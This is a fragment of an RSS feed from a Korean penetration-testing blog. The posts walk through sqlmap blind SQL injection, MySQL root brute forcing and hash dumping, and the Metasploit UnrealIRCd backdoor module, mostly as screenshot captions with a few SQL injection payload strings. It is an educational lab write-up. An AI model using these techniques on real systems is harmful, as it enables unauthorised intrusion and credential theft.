this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1905&quot; height=&quot;942&quot; data-origin-width=&quot;1905&quot; data-origin-height=&quot;942&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;\SQLMap은 파이썬 언어로 작성한 SQL 삽입 취약점 점검 도구로서 모의 침투 수행 시 필수적인 도구중 하나이다. 추출한 쿠기 정보를 이용하여 기본 문구를 작성하고 끝에 --banner를 적어 배너 정보를 획득한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1898&quot; data-origin-height=&quot;1014&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bRODPD/btrYTgxUgAh/jwpYatKrHl655Ytl5tb6SK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bRODPD/btrYTgxUgAh/jwpYatKrHl655Ytl5tb6SK/img.png&quot; data-alt=&quot;맨끝에 --dbs를 입력하여 mysql에서 show databases;명령어를 통해 나오는 같은 정보를 출력하여 정보를 획득한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bRODPD/btrYTgxUgAh/jwpYatKrHl655Ytl5tb6SK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbRODPD%2FbtrYTgxUgAh%2FjwpYatKrHl655Ytl5tb6SK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1898&quot; height=&quot;1014&quot; data-origin-width=&quot;1898&quot; data-origin-height=&quot;1014&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;맨끝에 --dbs를 입력하여 mysql에서 show databases;명령어를 통해 나오는 같은 정보를 출력하여 정보를 획득한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;728&quot; data-origin-height=&quot;348&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cRK0D6/btrYT9SC2ar/tQJhcjVHFSdZMUaJRBWkbK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cRK0D6/btrYT9SC2ar/tQJhcjVHFSdZMUaJRBWkbK/img.png&quot; data-alt=&quot;추출 과정을 자세히 보면 쿼리문을 만들어서 자동으로 검색이 되게 하는것이 보인다. id=10' or not 8667=8667문구를 통해 모두 거짓으로 만들고 에러가 발생했을때 다음 구문으로 이동하여&amp;amp;nbsp; id=10' or row(3904, 8047)를 참으로 만들어서 찾고자 하는 내용을 찾을 수 있게 한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cRK0D6/btrYT9SC2ar/tQJhcjVHFSdZMUaJRBWkbK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcRK0D6%2FbtrYT9SC2ar%2FtQJhcjVHFSdZMUaJRBWkbK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;728&quot; height=&quot;348&quot; data-origin-width=&quot;728&quot; data-origin-height=&quot;348&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;추출 과정을 자세히 보면 쿼리문을 만들어서 자동으로 검색이 되게 하는것이 보인다. id=10' or not 8667=8667문구를 통해 모두 거짓으로 만들고 에러가 발생했을때 다음 구문으로 이동하여&amp;nbsp; id=10' or row(3904, 8047)를 참으로 만들어서 찾고자 하는 내용을 찾을 수 있게 한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;261&quot; data-origin-height=&quot;270&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/tL22u/btrY2oBayMu/Sc6yBjhSR1YLmzBm3ixNg1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/tL22u/btrY2oBayMu/Sc6yBjhSR1YLmzBm3ixNg1/img.png&quot; data-alt=&quot;MySQL에서 show databases; 명령어를 검색 하였을때&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/tL22u/btrY2oBayMu/Sc6yBjhSR1YLmzBm3ixNg1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FtL22u%2FbtrY2oBayMu%2FSc6yBjhSR1YLmzBm3ixNg1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;261&quot; height=&quot;270&quot; data-origin-width=&quot;261&quot; data-origin-height=&quot;270&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;MySQL에서 show databases; 명령어를 검색 하였을때&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1901&quot; data-origin-height=&quot;989&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b31fs8/btrY1mwCT3g/23EDGx0GssmVyNegu9RLz1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b31fs8/btrY1mwCT3g/23EDGx0GssmVyNegu9RLz1/img.png&quot; data-alt=&quot;table정보를 획득한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b31fs8/btrY1mwCT3g/23EDGx0GssmVyNegu9RLz1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb31fs8%2FbtrY1mwCT3g%2F23EDGx0GssmVyNegu9RLz1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1901&quot; height=&quot;989&quot; data-origin-width=&quot;1901&quot; data-origin-height=&quot;989&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;table정보를 획득한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1895&quot; data-origin-height=&quot;1000&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/syGIj/btrY4lYwek1/oegw3hwSMExFUktiSConPK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/syGIj/btrY4lYwek1/oegw3hwSMExFUktiSConPK/img.png&quot; data-alt=&quot;users 테이블의 스키마를 확인할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/syGIj/btrY4lYwek1/oegw3hwSMExFUktiSConPK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FsyGIj%2FbtrY4lYwek1%2Foegw3hwSMExFUktiSConPK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1895&quot; height=&quot;1000&quot; data-origin-width=&quot;1895&quot; data-origin-height=&quot;1000&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;users 테이블의 스키마를 확인할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1897&quot; data-origin-height=&quot;1018&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mrFbG/btrYTg5NQlw/pkDaSNHoN0kkqVyMElLigk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mrFbG/btrYTg5NQlw/pkDaSNHoN0kkqVyMElLigk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mrFbG/btrYTg5NQlw/pkDaSNHoN0kkqVyMElLigk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmrFbG%2FbtrYTg5NQlw%2FpkDaSNHoN0kkqVyMElLigk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1897&quot; height=&quot;1018&quot; data-origin-width=&quot;1897&quot; data-origin-height=&quot;1018&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1351&quot; data-origin-height=&quot;1006&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ba52xO/btrY5lRGMqM/Knwgwv6vwmUK1E69RFttu1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ba52xO/btrY5lRGMqM/Knwgwv6vwmUK1E69RFttu1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ba52xO/btrY5lRGMqM/Knwgwv6vwmUK1E69RFttu1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fba52xO%2FbtrY5lRGMqM%2FKnwgwv6vwmUK1E69RFttu1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1351&quot; height=&quot;1006&quot; data-origin-width=&quot;1351&quot; data-origin-height=&quot;1006&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;do you want to store hashes to a temporary file for eventual further processing with other tools&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;(&lt;span style=&quot;background-color: #ffffff; color: #424242;&quot;&gt;다른 도구를 사용하여 최종적으로 추가 처리할 수 있도록 임시 파일에 해시를 저장하시겠습니까라는 문구가 나오는데 N를 해준다)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #424242;&quot;&gt;do&amp;nbsp;you&amp;nbsp;want&amp;nbsp;to&amp;nbsp;crack&amp;nbsp;them&amp;nbsp;via&amp;nbsp;a&amp;nbsp;dictionary-based&amp;nbsp;attack?&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #424242;&quot;&gt;(사전에 기반한 공격을 통해 해독을 하겠습니까 문구에는 Y를 해준다.)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #424242;&quot;&gt;&lt;span style=&quot;background-color: #ffffff;&quot;&gt;자동으로 blind injection 공격을 통해 해당 데이터베이스의 계정정보, 패스워드, 스키마, 테이블구조, 데이터베이스의 정보를 획득 할 수 있다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>Kali Linux</category>
      <author>Pulseeee</author>
      <guid isPermaLink="true">https://it-mandarine.tistory.com/73</guid>
      <comments>https://it-mandarine.tistory.com/73#entry73comment</comments>
      <pubDate>Mon, 13 Feb 2023 11:33:24 +0900</pubDate>
    </item>
    <item>
      <title>MySQL 정보 수집</title>
      <link>https://it-mandarine.tistory.com/72</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;872&quot; data-origin-height=&quot;133&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cWu82C/btrYMYh7WJV/ENsP6FTzL18PX1vsEzeKRK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cWu82C/btrYMYh7WJV/ENsP6FTzL18PX1vsEzeKRK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cWu82C/btrYMYh7WJV/ENsP6FTzL18PX1vsEzeKRK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcWu82C%2FbtrYMYh7WJV%2FENsP6FTzL18PX1vsEzeKRK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;872&quot; height=&quot;133&quot; data-origin-width=&quot;872&quot; data-origin-height=&quot;133&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;서버를 침투하기 전 사전의 준비가 필요하다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;먼저 root을 탈취하기 위한 무한대입공격, 해쉬덤프를 이용한 암호해독 그리고 버전 정보 획득 등이 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;846&quot; data-origin-height=&quot;156&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/vlER2/btrYIxzytxY/jQTCKfzpBgcSFkEaUWFgJk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/vlER2/btrYIxzytxY/jQTCKfzpBgcSFkEaUWFgJk/img.png&quot; data-alt=&quot;버전 정보 획득&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/vlER2/btrYIxzytxY/jQTCKfzpBgcSFkEaUWFgJk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FvlER2%2FbtrYIxzytxY%2FjQTCKfzpBgcSFkEaUWFgJk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;846&quot; height=&quot;156&quot; data-origin-width=&quot;846&quot; data-origin-height=&quot;156&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;버전 정보 획득&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;버전 정보를 획득하여 무한 대입 공격으로 root계정의 비밀번호를 획득한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;662&quot; data-origin-height=&quot;244&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/EQxrS/btrY4lYr7a6/V965dKuTaf3EErKsVj85Yk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/EQxrS/btrY4lYr7a6/V965dKuTaf3EErKsVj85Yk/img.png&quot; data-alt=&quot;인증 정보에 기반하여 MySQL 서버에 저장된 스키마와 해쉬ㅏ 정보 등을 출력한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/EQxrS/btrY4lYr7a6/V965dKuTaf3EErKsVj85Yk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FEQxrS%2FbtrY4lYr7a6%2FV965dKuTaf3EErKsVj85Yk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;662&quot; height=&quot;244&quot; data-origin-width=&quot;662&quot; data-origin-height=&quot;244&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;인증 정보에 기반하여 MySQL 서버에 저장된 스키마와 해쉬ㅏ 정보 등을 출력한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;635&quot; data-origin-height=&quot;358&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bYyDOq/btrYTfTiFIn/IQP3p3qAeUA371i32Olqs1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bYyDOq/btrYTfTiFIn/IQP3p3qAeUA371i32Olqs1/img.png&quot; data-alt=&quot;해쉬 정보도 출력 시킬 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bYyDOq/btrYTfTiFIn/IQP3p3qAeUA371i32Olqs1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbYyDOq%2FbtrYTfTiFIn%2FIQP3p3qAeUA371i32Olqs1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;635&quot; height=&quot;358&quot; data-origin-width=&quot;635&quot; data-origin-height=&quot;358&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;해쉬 정보도 출력 시킬 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;928&quot; data-origin-height=&quot;128&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bRWMe6/btrYYqsuGdJ/ARYx2axNj45PCXv5kqwwt0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bRWMe6/btrYYqsuGdJ/ARYx2axNj45PCXv5kqwwt0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bRWMe6/btrYYqsuGdJ/ARYx2axNj45PCXv5kqwwt0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbRWMe6%2FbtrYYqsuGdJ%2FARYx2axNj45PCXv5kqwwt0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;928&quot; height=&quot;128&quot; data-origin-width=&quot;928&quot; data-origin-height=&quot;128&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;657&quot; data-origin-height=&quot;295&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kAkCp/btrYUTvfpNV/4APMaUghsAcIidTeBHTHXk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kAkCp/btrYUTvfpNV/4APMaUghsAcIidTeBHTHXk/img.png&quot; data-alt=&quot;MySQL 해쉬정보를 출력시킨 결과이다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kAkCp/btrYUTvfpNV/4APMaUghsAcIidTeBHTHXk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkAkCp%2FbtrYUTvfpNV%2F4APMaUghsAcIidTeBHTHXk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;657&quot; height=&quot;295&quot; data-origin-width=&quot;657&quot; data-origin-height=&quot;295&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;MySQL 해쉬정보를 출력시킨 결과이다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1002&quot; data-origin-height=&quot;41&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/oWciH/btrY5lD7lCz/lKC3cMzld1yTiElSeksXp1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/oWciH/btrY5lD7lCz/lKC3cMzld1yTiElSeksXp1/img.png&quot; data-alt=&quot;/root/.msf4/loot 디렉토리에 txt파일로 출력된 정보가 저장된다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/oWciH/btrY5lD7lCz/lKC3cMzld1yTiElSeksXp1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FoWciH%2FbtrY5lD7lCz%2FlKC3cMzld1yTiElSeksXp1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1002&quot; height=&quot;41&quot; data-origin-width=&quot;1002&quot; data-origin-height=&quot;41&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;/root/.msf4/loot 디렉토리에 txt파일로 출력된 정보가 저장된다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>Kali Linux</category>
      <author>Pulseeee</author>
      <guid isPermaLink="true">https://it-mandarine.tistory.com/72</guid>
      <comments>https://it-mandarine.tistory.com/72#entry72comment</comments>
      <pubDate>Fri, 10 Feb 2023 12:57:39 +0900</pubDate>
    </item>
    <item>
      <title>unreal_ircd_3281_backdoor.rb 모듈을 이용한 침투</title>
      <link>https://it-mandarine.tistory.com/71</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;unreal_ircd_3281_backdoor.rb&amp;nbsp;모듈을&amp;nbsp;이용한&amp;nbsp;침투&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 모듈은 osvdb-65445/cve-2015-2075 취약점에 기반함 침투 모듈이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;UnrealIRCd에 트로이 목마 기반의 악성코드를 삽입해 공격자가 원격에서 악성 코드를 실행시킬 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;IRC란 실시간 채팅 프로토콜이고 UnrealIRCd란 오픈 소스 IRC 데몬을 의미힌다. 해당 취약점은 UnrealIRCd 3.2.8.1버전에서 실행할 수 있다고 알려졌다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;873&quot; data-origin-height=&quot;133&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/UzLe0/btrYGt5oBev/o7nVBTNu7rixEYIPY7wJK0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/UzLe0/btrYGt5oBev/o7nVBTNu7rixEYIPY7wJK0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/UzLe0/btrYGt5oBev/o7nVBTNu7rixEYIPY7wJK0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FUzLe0%2FbtrYGt5oBev%2Fo7nVBTNu7rixEYIPY7wJK0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;873&quot; height=&quot;133&quot; data-origin-width=&quot;873&quot; data-origin-height=&quot;133&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;905&quot; data-origin-height=&quot;233&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bixrOf/btrYIch2PEX/hDSfFpEkcCiecWDtKwhqUk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bixrOf/btrYIch2PEX/hDSfFpEkcCiecWDtKwhqUk/img.png&quot; data-alt=&quot;UnrealIRCd 포트가 개방되어 있는지 스캔한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bixrOf/btrYIch2PEX/hDSfFpEkcCiecWDtKwhqUk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbixrOf%2FbtrYIch2PEX%2FhDSfFpEkcCiecWDtKwhqUk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;905&quot; height=&quot;233&quot; data-origin-width=&quot;905&quot; data-origin-height=&quot;233&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;UnrealIRCd 포트가 개방되어 있는지 스캔한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;341&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/djr30w/btrYPEXQvPd/vPSEsnln3cCpN3mwT8wiRK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/djr30w/btrYPEXQvPd/vPSEsnln3cCpN3mwT8wiRK/img.png&quot; data-alt=&quot;침투 모듈을 이용하여 침투 하였다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/djr30w/btrYPEXQvPd/vPSEsnln3cCpN3mwT8wiRK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fdjr30w%2FbtrYPEXQvPd%2FvPSEsnln3cCpN3mwT8wiRK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;903&quot; height=&quot;341&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;341&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;침투 모듈을 이용하여 침투 하였다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;iptables&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;INPUT(incoming) DROP&lt;/b&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 99.8837%; height: 68px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 32.2867%; height: 17px; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 34.3799%; height: 17px; text-align: center;&quot;&gt;Source&lt;/td&gt;
